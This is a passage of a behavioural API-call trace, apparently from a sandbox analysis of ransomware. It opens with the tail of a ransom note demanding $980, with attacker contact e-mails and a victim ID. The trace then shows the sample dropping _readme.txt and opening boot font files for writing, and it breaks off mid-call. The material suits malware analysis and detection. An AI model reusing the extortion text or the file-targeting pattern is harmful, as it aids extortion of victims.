contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.694] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.695] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*" (normalized: "c:\\boot\\fonts\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.696] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.696] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0183.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.697] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0183.697] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.697] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0183.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.698] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0183.698] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.699] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0183.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.700] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0183.700] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.700] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0183.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.701] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0183.701] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.701] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0183.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.702] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0183.702] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.703] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0183.703] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.703] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.703] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.728] HeapFree (in: hHeap=0x2c0000, 